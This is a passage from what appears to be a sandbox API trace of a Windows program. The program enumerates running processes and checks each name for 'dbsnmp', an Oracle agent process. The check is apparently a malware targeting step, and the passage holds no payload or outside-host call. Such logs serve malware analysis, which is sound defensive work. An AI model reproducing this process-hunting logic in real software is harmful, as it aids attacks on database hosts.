lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.897] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.897] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.897] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.898] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3543dc0 [0092.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3543dc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.898] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.898] StrStrIA (lpFirst="taskhostw.exe", lpSrch="dbsnmp") returned 0x0 [0092.898] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0092.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.899] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543bc8 [0092.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3543bc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0092.899] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0092.899] StrStrIA (lpFirst="explorer.exe", lpSrch="dbsnmp") returned 0x0 [0092.899] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0092.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.900] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3543238 [0092.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3543238, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0092.901] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0092.901] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="dbsnmp") returned 0x0 [0092.901] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0092.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0092.902] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3566688 [0092.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x3566688, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0092.902] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0092.902] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="dbsnmp") returned 0x0 [0092.902] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0092.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.903] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35434b8 [0092.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x35434b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0092.903] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0092.903] StrStrIA (lpFirst="Memory Compression", lpSrch="dbsnmp") returned 0x0 [0092.903] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0092.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0092.904] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3543378 [0092.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3543378, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0092.904] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0092.904] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="dbsnmp") returned 0x0 [0092.904] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0092.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.905] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543be0 [0092.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3543be0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0092.905] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0092.905] StrStrIA (lpFirst="SearchUI.exe", lpSrch="dbsnmp") returned 0x0 [0092.905] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0092.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.906] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3543278 [0092.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3543278, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0092.906] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0092.906] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="dbsnmp") returned 0x0 [0092.906] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0092.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.907] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543cd0 [0092.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3543cd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0092.907] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0092.907] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="dbsnmp") returned 0x0 [0092.907] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0092.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.908] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543c70 [0092.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3543c70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0092.908] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0092.908] StrStrIA (lpFirst="pending.exe", lpSrch="dbsnmp") returned 0x0 [0092.908] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0092.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0092.921] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3566840 [0092.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3566840, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0092.921] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0092.921] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="dbsnmp") returned 0x0 [0092.921] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0092.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.923] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35433b8 [0092.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x35433b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0092.923] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0092.923] StrStrIA (lpFirst="swing prefer.exe", lpSrch="dbsnmp") returned 0x0 [0092.923] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0092.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0092.924] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x35666d8 [0092.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x35666d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0092.924] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0092.924] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="dbsnmp") returned 0x0 [0092.924] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0092.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.925] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3543298 [0092.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3543298, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0092.925] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0092.925] StrStrIA (lpFirst="nights-attending.exe", lpSrch="dbsnmp") returned 0x0 [0092.925] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0092.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.926] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3543dd8 [0092.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3543dd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0092.926] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0092.926] StrStrIA (lpFirst="installed.exe", lpSrch="dbsnmp") returned 0x0 [0092.926] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0092.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0092.927] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3566890 [0092.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x3566890, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0092.927] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0092.927] StrStrIA (lpFirst="references compounds.exe", lpSrch="dbsnmp") returned 0x0 [0092.927] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0092.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.928] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35432d8 [0092.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x35432d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0092.928] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0092.928] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="dbsnmp") returned 0x0 [0092.928] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0092.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.929] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35434d8 [0092.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x35434d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0092.929] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0092.929] StrStrIA (lpFirst="registered try.exe", lpSrch="dbsnmp") returned 0x0 [0092.929] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0092.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.930] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566750 [0092.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x3566750, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0092.930] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0092.930] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="dbsnmp") returned 0x0 [0092.930] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0092.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.931] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543bb0 [0092.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3543bb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0092.931] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0092.931] StrStrIA (lpFirst="invite.exe", lpSrch="dbsnmp") returned 0x0 [0092.931] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0092.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.932] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3543df0 [0092.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3543df0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0092.933] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0092.933] StrStrIA (lpFirst="idol.exe", lpSrch="dbsnmp") returned 0x0 [0092.933] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0092.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.934] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566430 [0092.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3566430, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0092.934] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0092.934] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="dbsnmp") returned 0x0 [0092.934] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0092.935] 